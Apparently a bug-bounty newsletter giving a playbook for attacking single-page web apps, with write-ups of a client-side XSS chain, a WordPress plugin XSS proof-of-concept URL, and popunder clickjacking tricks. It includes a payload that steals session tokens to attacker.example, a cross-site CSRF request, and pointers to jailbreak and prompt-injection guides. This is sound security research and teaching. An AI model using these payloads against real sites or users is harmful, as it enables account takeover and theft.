[HackerNotes Ep.114] Single Page Application Hacking Playbook
We're diving into Single Page Applications (SPAs) and how to attack them. We also cover a host of news items, including some bug write-ups, AI updates, and a new tool called Hackadvisor.
Hacker TL;DR
Hacking High-Profile Bug Bounty Targets: Deep Dive into a Client-Side Chain: A great blog post and a crazy chain, with a CSPT + JSON file Upload Gadget → XSS via Cookie Path Manipulation. Check it out below.
12,000 ‘Live’ API Keys and Passwords in DeepSeek's Training Data: Some fresh research from Truffle Security uncovering a bunch of active secrets in Common Crawl. Maybe a good time to start scanning for some bug bounty targets:
11,908 live API keys in just one chunk of Common Crawl's Dec 2024 dataset (400TB).
2.76M pages leaked credentials.
63% of leaked secrets were reused (one API key was found 57,000 times)
Hackadvisor.io: A community-driven review system for bug bounty programs:
Check out Hackadvisor.io before choosing a program.
Submit your own experiences to build a reliable dataset.
Prioritize programs with fair payouts, solid scopes & responsive triaging.
LLMs Drop, Prompt Injection Research + ShadowRepeater: Thankfully we’ve got rez0 keeping us posted with the latest, including some extensive prompt injection research and a bunch more below. Check out the research here:
Attacking SPAs: We’ve got some pretty nice content on attacking SPAs below - there was too much to fit in, but here’s a taste. Recon in an SPA:
Downloading & Parsing JavaScript Files: Extract endpoints, parameters, and any custom headers.
‘PPrettify’ & Reverse the JS: Check out Parallel Prettier if you haven’t already - it’s amazing for tackling minified or obfuscated bundles.
Identify Feature Flags: Feature flags often hide entire chunks of functionality. Investigate them after you have context, so you notice if something changes after toggling a flag.
Identifying Clientside Paths: More on this shortly, but identifying all clientside paths can be pretty easy and incredibly fruitful in SPAs. By checking the clientside router and searching for Path: or similar, you’ll be able to map them out quickly.
ThreatLocker Cloud Control leverages built-in intelligence to assess whether a connection from a protected device originates from a trusted network. By analyzing connection patterns from protected computers and mobile devices, it automatically identifies and allows trusted connections.
Find out more here:
If you hang around in the CTBB Discord, you’ve likely seen some mention of Busfactor’s and XSSDoctor’s bugs. They recently dropped a banger of a blog post, chaining quite a few gadgets into a beautiful bug, with the chain looking like: CSPT+JSON+SelfXSS -> cookie path -> XSS
The bug starts with a CSPT and figuring out a means of manipulating the path. With a CSPT, we need one of three things to exploit it: an open redirect, a file upload/JSON upload gadget, or an endpoint that performs a state-changing action (think deleting an account).
They did in fact have a means of file upload, but instead of responding with the file’s contents, the upload endpoint would respond with a link to a location to download the file, i.e.:
{
"url":"https://location.com/file/download"
}
Usually, it would stop there. But some parameter brute forcing/discovery yielded a hidden parameter on the endpoint - redirect=true - which, when passed, would respond with the actual contents of the file instead of the URL to its location.
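To make the gadget concrete, here’s a rough sketch of the difference - the endpoint, ID and response shapes are hypothetical, not taken from the blog:

// Hypothetical sketch of the upload-download gadget described above.
// Without the hidden parameter, the endpoint only returns a pointer to the file:
//   GET /api/files/123               -> {"url":"https://location.com/file/download"}
// With the hidden parameter, it serves the attacker-controlled contents directly:
//   GET /api/files/123?redirect=true -> <raw uploaded JSON>
const res = await fetch('/api/files/123?redirect=true', { credentials: 'include' });
console.log(await res.json()); // attacker-controlled JSON, usable as the CSPT sink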
As if that wasn’t enough, it didn’t stop there: they also had CORS to deal with. The uploaded file wasn’t being served with the appropriate CORS headers, meaning they weren’t able to read the file’s response as part of their chain. Taken straight from the blog, this was the overview:

Because CloudFront was caching the response, the appropriate CORS headers were never added. Thanks to what appears to be a misconfig, by adding the appropriate Origin: header by hand in an initial request and re-forcing the CloudFront cache, they were able to get the appropriate CORS headers cached onto the response.
The reason for this: when initially clicking on the file to download it, the browser performed a top-level navigation, which does not include the Origin header. This was also the request that was getting (unhelpfully) cached by CloudFront. By instead manually adding the Origin: header in the request and re-forcing the cache on CloudFront’s side, they ensured all subsequent responses would include the appropriate CORS headers.
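For context on why that cache-priming matters, here’s a rough sketch (hostname hypothetical) of the cross-origin read that only works once the CORS headers have been cached onto the response:

// Once the cached copy of the file carries Access-Control-Allow-Origin
// (primed out-of-band by replaying the download request with an Origin header
// from a proxy), the attacker's page can finally read it cross-origin:
const fileRes = await fetch('https://cdn.victim-example.com/file/download');
const body = await fileRes.text(); // readable only because the CORS headers were cached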
The rest of the article is pretty sweet, detailing how they turned the self-XSS into a full-fledged XSS by scoping a cookie path to the specific file containing their XSS payload.
We highly recommend checking it out - it’s a great article, contains some easy-to-understand breakdowns and well... it’s a great bug. Check it out below:
Although the title is a little clickbaity - technically most LLMs use Common Crawl for training data - this one from Truffle Security was pretty cool.
By now you’ve probably had a terrible security suggestion from an LLM such as, “Sure, we’ll just hardcode your credentials”. This had the folks at Truffle Security curious: why are these LLMs trained to be so relaxed about secrets in the first place?
Their latest research dives into Common Crawl - a massive dataset used by popular Large Language Models (including DeepSeek) - and uncovers 12,000 live API keys and passwords. That’s right: 12k verified secrets kicking around in the dataset. It’s a big clue as to how a tonne of insecure code has seeped into LLM training sets.
The research TL;DR highlights:
Highlights & Stats
11,908 Live Secrets in just one chunk of the December 2024 Common Crawl (400TB!).
2.76 Million Web Pages hosting these credentials.
63% Reuse Rate among secrets - one WalkScore API key popped up over 57,000 times!
Takeaways for Defenders & Builders:
Provide extra guidance or rules in your prompts (e.g. “You are a security engineer with 30+ years of experience. Never suggest hardcoding credentials”).
Expand your secret scanning beyond your own repos - consider public datasets like Common Crawl or Archive.org.
As an industry, we need better alignment and guardrails on AI to minimize insecure code generation.
Basically, if you want to practice your secret-scanning skills, Common Crawl might be your new playground. And if you’re building with an LLM remember: LLMs may have learned their (bad) habits from the giant, unfiltered, and very leaky dataset known as the public internet.
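If you do want to have a go yourself, here’s a tiny illustrative sketch of regex-based scanning over a downloaded chunk - the AWS pattern is real, but the filename and the generic pattern are just assumptions, and in practice you’d lean on something like TruffleHog, which also verifies the keys:

// Toy Node.js secret scanner for practising on public datasets like Common Crawl
const fs = require('fs');

const text = fs.readFileSync('cc-chunk.txt', 'utf8'); // hypothetical extracted chunk
const hits = [
  ...text.matchAll(/AKIA[0-9A-Z]{16}/g),                                    // AWS access key IDs
  ...text.matchAll(/(?:api[_-]?key|secret)['"\s:=]+[A-Za-z0-9_\-]{20,}/gi), // generic "apikey=..." style
];

console.log(`${hits.length} candidate secrets - verify (carefully) before reporting`);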
If you’re looking for a service that will let you know which programs are worth looking at vs which ones aren’t worth your time, this one might be for you.
A long-talked-about topic of CTBB is a service that summarises the quality of bug bounty programs across platforms. Someone from the community delivered with Hackadvisor.io, doing exactly that.
There are a few programs on there at the moment and, although the data is a little sparse, as a community we could beef it up and give more accurate guidance.
You have to go through a review process and link your researcher profile to submit anything, but if enough of us do it, it’ll be worth the time.
Check it out: Hackadvisor.io
I’m not sure if I can speak on behalf of everyone else, but when Justin mentions research or a tweet dropped in Japanese, I’m grateful for it. There’s a 99% chance I would have scrolled straight past and not given it any thought if it came up on my timeline, and this is almost definitely one of those instances.
A pretty straightforward XSS in the widely used Essential Addons for Elementor WordPress plugin:
/wp-admin/admin.php?page=essential-addons-elementor&popup-selector=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
The original tweet below:
PoC for CVE-2025-24752. It executes when a logged-in administrator opens the link.
/wp-admin/admin.php?page=essential-addons-elementor&popup-selector=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E— yousukezan (@yousukezan)
10:56 AM • Feb 26, 2025
LLMs Drop, Prompt Injection Research & ShadowRepeater
Thankfully, Rez0 has been keeping us up to date on all the latest AI research and tool drops. In just the past few weeks, we’ve seen a flurry of releases: Grok3 (likely your best bet for AppSec or pentesting assistance) made its debut, Sonnet 3.7 landed (great for coding), and GPT 4.5 also hit the scene. On top of that, there’s fresh research around prompt injection and a new tool called ShadowRepeater that aims to make fuzzing even easier.
If you want an extremely comprehensive guide to jailbreaking and prompt injection, add this one to your bookmarks:
Rez0 himself also dropped a very comprehensive blog post. Worth a read:
Between the two resources, you’re probably good to go and start hunting some AI-based bugs.
ShadowRepeater
This is an interesting one from PortSwigger: an AI-enhanced feature to aid your fuzzing and testing - it simply fuzzes your Repeater tabs behind the scenes. It watches the payloads you’re trying, then tests permutations of them in the background.
If anything is found, it will be reported in the Organizer tab. The release can be checked out below:
We've just released Shadow Repeater, for AI-enhanced manual testing. Simply use Burp Repeater as you normally would, and behind the scenes Shadow Repeater will learn from your attacks, try payload permutations, and report any discoveries via Organizer.
— Gareth Heyes (@garethheyes)
1:21 PM • Feb 20, 2025
Cool idea, but as the guys said on the pod, I’m not sure how I feel about this running in the background without any direction. Regardless, it’s a great concept and PortSwigger will likely build some nice features onto it.
This is some great research by jorianwoltjer. The research details how a pop-up window can trick a user into “accidentally” clicking a sensitive button (e.g., OAuth “Allow”) simply by holding down the spacebar or enter key.
Furthermore, when a focused button has an id or autofocus, pressing space/enter triggers its action - even if the user doesn’t realize they’re interacting with it.
The two main takeaways for this one:
Popunder
This one is taken from the research directly: ‘There is the intuitive window.focus() method that should allow you to focus any window reference. In reality, this method very rarely works and you should definitely not rely on it from my experience.’
Instead, you can use the target argument of window.open(url, target, windowFeatures) to focus windows: perform a window.open against an already-open named window and set the hash of that page - it won’t reload the page, but it will bring its window into focus. (There’s a sketch of both tricks after the next takeaway.)
.moveTo()
Even if the popup is cross-origin, you can still call window.moveTo(x, y) on it to reposition it anywhere on the screen. This can be a game-changer for clickjacking and “Sandwich Technique” attacks, since you can dynamically align the popup directly beneath the user’s cursor. Combined with the popunder trick, .moveTo() helps you shuffle windows around in ways the user might not notice - perfect for sneaky double-click or spacebar-press exploits.
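A rough sketch of both tricks together, from the attacker’s page - the URLs, window name and coordinates are made up, and the cross-origin .moveTo() behaviour is as described in the research:

// 1. Open a named window. Re-"opening" the same name with only a hash change
//    won't reload the page, but it does bring that window back into focus.
const win = window.open('https://victim-example.com/oauth/authorize', 'oauthwin', 'width=500,height=600');

// later: refocus the named window without reloading it
window.open('https://victim-example.com/oauth/authorize#focus', 'oauthwin');

// 2. Reposition the popup so the sensitive button lands under the key the
//    user is already holding down (per the research, this works cross-origin).
win.moveTo(window.screenX + 200, window.screenY + 200);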
This tweet by Renwa dropped a POC with a popunder essentially built into Chrome by abusing the way the Sign in with Google functionality works and how it’s embedded into the browser. It also probably isn’t being patched any time soon - check out the POC:
Attacking SPAs
A quick TL;DR of the SPA (single page app) architecture if you aren’t familiar:
A single-page application (SPA) is basically a web app that loads one main HTML page, and then dynamically updates different sections as you navigate around. Instead of making full-page reloads, it just swaps content, handling everything client-side.
The good news? All the goodies (endpoints, parameters, tokens, etc.) end up right there in the JavaScript, so from an app recon perspective, you’ve got a goldmine.
Recon in an SPA
Because SPAs load everything upfront, you essentially have the entire codebase - HTML, JS, CSS - ready to be dissected. So start by:
Downloading & Parsing JavaScript Files
Extract endpoints, parameters, and any custom headers.
‘PPrettify’ & Reverse the JS
Check out Parallel Prettier if you haven’t already - it’s amazing for tackling minified or obfuscated bundles.
Identify Feature Flags
Feature flags often hide entire chunks of functionality. Investigate them after you have context, so you notice if something changes after toggling a flag.
Identifying Clientside Paths
More on this shortly, but identifying all clientside paths can be pretty easy and incredibly fruitful in SPAs.
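As a starting point for the first and last steps above, here’s a rough Node.js sketch that pulls API-looking endpoints and custom headers out of a downloaded bundle - the filename and regexes are just assumptions to tune per target:

// Grep a downloaded bundle for API-looking paths and custom header names
const fs = require('fs');

const src = fs.readFileSync('app.bundle.js', 'utf8'); // hypothetical bundle filename
const endpoints = [...src.matchAll(/['"`](\/(?:api|v\d)\/[^'"`\s]*)['"`]/g)].map(m => m[1]);
const headers = [...src.matchAll(/['"](x-[a-z0-9-]{2,})['"]/gi)].map(m => m[1]);

console.log('endpoints:', [...new Set(endpoints)].sort());
console.log('custom headers:', [...new Set(headers)].sort());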
Match-Replace Rules
While you’re hunting down parameters and endpoints, consider using match-replace (or rewrite) rules to manipulate feature flags. Look for strings like Path:, Bearer, feature, or direct references to flags in the code. If you can flip a feature flag normally reserved for employees, higher-tier subscriptions, or privileged user roles, you could unlock hidden functionality you wouldn’t otherwise have access to.
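As a purely hypothetical illustration (the flag names and global are made up), flipping a flag can be as simple as a proxy match/replace on the bundle, or a console override if the app reads flags at runtime:

// If the bundle ships something like:
//   const flags = { adminPanel: false, newBilling: false };
// a match/replace rule rewriting `adminPanel: false` -> `adminPanel: true` in the
// JS response will expose the gated UI. If flags live on a runtime global instead:
window.__FEATURE_FLAGS__ = { ...window.__FEATURE_FLAGS__, adminPanel: true }; // hypothetical global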
Dealing with Webpack
Webpack bundles can be a headache. Sometimes .map files are exposed (like app.js.map), giving you a direct mapping back to the original source code. If it’s not obvious in the file listings, try appending .map to the filename in your requests. You might get lucky and retrieve a full set of source maps.
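A quick way to check (the bundle URL is hypothetical): fetch each bundle URL with .map appended and see if valid source-map JSON comes back - the sources and sourcesContent fields hold the original files.

// Probe for exposed Webpack source maps
const bundles = ['https://app.example.com/static/js/app.3f9c21.js']; // hypothetical

for (const url of bundles) {
  const res = await fetch(url + '.map');
  if (!res.ok) continue;
  const map = await res.json();
  console.log(url, '->', map.sources.length, 'original source files');
  // map.sourcesContent, if present, holds the full unminified source for each entry
}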
PPrettier Files
Seriously, if you haven’t used Parallel Prettier, do yourself a favour. It’s your best friend for quickly prettifying huge compiled JS bundles. Once beautified, you can set breakpoints in your browser dev tools or do manual code review with much less hair-pulling.
DOM XSS
SPAs often skip the old-school POST → server → reflect → injection flow. Instead, you’ll see a lot more DOM-based or stored DOM XSS. Why? Because everything is client-side. If you can find a spot where user input flows into .innerHTML or some dynamic property without sanitization, that’s your jackpot.
Most of these apps store session tokens in localStorage or sessionStorage and use Authorization: Bearer <token> headers. That means if you pop a DOM XSS, it’s basically ATO.
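A sketch of why that’s effectively ATO (the storage key and exfil host are hypothetical): once your JS runs in the app’s origin, the bearer token is a one-liner away.

// DOM XSS payload body: grab the token from Web Storage and exfiltrate it
const token = localStorage.getItem('access_token') || sessionStorage.getItem('access_token');
new Image().src = 'https://attacker.example/c?t=' + encodeURIComponent(token);
// ...or skip the exfil and replay actions in-page with
// fetch('/api/me', { headers: { Authorization: 'Bearer ' + token } })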
On the off chance an SPA still uses cookies for authentication, that signals potential CSRF risk. SPAs are typically less cookie-oriented for session management, but if they do use them, definitely test for CSRF. Don’t forget to try weird combos like sending Content-Type: text/plain but still including a JSON body - sometimes that sneaks past oversimplified CSRF protections.
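A minimal sketch of that combo (endpoint and body are hypothetical): text/plain keeps the request preflight-free, but a lenient backend may still parse the body as JSON.

// Hosted on the attacker's page; only matters if the SPA authenticates with cookies
fetch('https://victim-example.com/api/account/email', {
  method: 'POST',
  mode: 'no-cors',                           // we don't need to read the response
  credentials: 'include',                    // send the victim's cookies
  headers: { 'Content-Type': 'text/plain' }, // "simple" content type -> no preflight
  body: JSON.stringify({ email: 'attacker@example.com' }),
});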
Caching Attacks
If the SPA and its static assets are served from the same domain (e.g., an S3 bucket, CloudFront, or similar), user-specific logic usually lives in the backend API. That can make caching attacks less likely to work. However, when an SPA serves its API and static assets from the same host (/api/ endpoints plus a /static/ path, for example), you might see interesting caching misconfigurations. Keep an eye on those Cache-Control headers - there might be room to cause some cache discrepancies.
Attacking APIs
Now, on to the real meat: the backend. SPAs rely on APIs for almost everything. The fun part is you can sometimes swap out the backend or discover staging endpoints that lead to huge exploits. For example:
Swapping Out the API Backend
Some SPAs let you override the “API origin” if you set window.dev = true; or specify a query parameter like ?env=staging. If the dev or staging environment uses the same signing keys for JWTs, you can generate a token in dev and use it in production. That’s instant admin or ATO.
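A hypothetical illustration of what to look for and try - the globals, parameter and hosts below are made up, not a pattern from any specific target:

// The bundle might contain something along the lines of:
//   const API_BASE = window.dev ? 'https://api.staging.example.com'
//                               : 'https://api.example.com';
// If so, try flipping it before the app boots, or via the query string:
window.dev = true; // or visit https://app.example.com/?env=staging
// ...then watch which host the SPA talks to, and test whether a JWT minted by
// the staging backend is accepted by the production API.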
Look for clues in the JS
The code often references multiple backends: staging, dev, QA, etc. There might be leftover code or environment variables like STAGING_API_URL. That’s your sign to see if those endpoints are still live.
Smart Bruteforce on APIs
You won’t get far bruting the main domain (often just an S3 bucket returning the same content), but the API endpoints are fair game for enumeration. Use tools like KiteRunner, but also keep your eyes open for logical endpoints gleaned from the JS, older code versions, or wayback archives.
Use Old JS Files
Check out Wayback Machine or old commits. If you find outdated JS, you might see references to endpoints or parameters that still exist but aren’t documented in the new app.
Client-Side Paths
In an SPA, the path in the browser doesn’t necessarily trigger new server requests. Instead, history.pushState updates the URL, and the client-side router does the rest. So enumerating all the client-side paths may reveal hidden pages or features. Some examples of what you might see and want to look out for:
route: '/secret-area'
path: '/internal'
Any mention of user roles or permissions in route definitions
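A rough Node.js grep for those route definitions - the filename is hypothetical, and the pattern will need tuning for whichever router the app uses:

// Pull client-side route definitions out of a downloaded bundle
const fs = require('fs');

const src = fs.readFileSync('app.bundle.js', 'utf8'); // hypothetical bundle filename
const routes = [...src.matchAll(/\b(?:path|route)\s*:\s*['"]([^'"]+)['"]/g)].map(m => m[1]);

console.log([...new Set(routes)].sort().join('\n')); // e.g. /internal, /secret-area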
Wayback URLs
SPAs tend to change quickly, so older JS files might show up in the Wayback Machine. Grab them, parse them, and do some comparison with your current JS. You might find old endpoints, feature flags, or that staging environment mentioned above.
What Not to Do
Don’t Waste Time Brute-Forcing the Main Site
Often, it’s just a static hosting setup (like S3) giving the same response for everything. Focus on the API endpoints instead.
Don’t Assume Traditional XSS
Reflective XSS is less common in SPAs. If you’re going for cross-site scripting, look for DOM-based or stored DOM injection points.
Don’t Overlook Client-Side Access Controls
Many SPAs handle role checks purely in JavaScript. If you see if (user.role === 'admin') gating an entire feature, you could likely match-and-replace that client-side. Don’t overlook it.
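Purely as an illustration (the object names are assumptions), the gate often looks like the snippet below. Flipping it client-side only proves the UI hides things - the real finding is whichever API calls behind it aren’t re-checked server-side.

// What the bundle might ship:
//   if (user.role === 'admin') { renderAdminPanel(); }
// Proxy match/replace:  user.role === 'admin'  ->  true
// or, if the app exposes state on a global, override it from the console:
window.appState.user.role = 'admin'; // hypothetical global; now exercise the unlocked features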
Attacking SPAs isn’t the same as hammering an old-school monolith. You’ve got a front-end that does almost everything in JS, and an API it depends on for the rest. Digging into the bundles, toggling feature flags, enumerating hidden routes, and seeing if you can pivot from staging or dev environments to production are some of the things you should be trying when approaching these kinds of targets.
And remember: DOM XSS is your friend, especially with tokens living in localStorage or sessionStorage. If you can pop an alert, you might just pop an entire user session.
As always, keep hacking!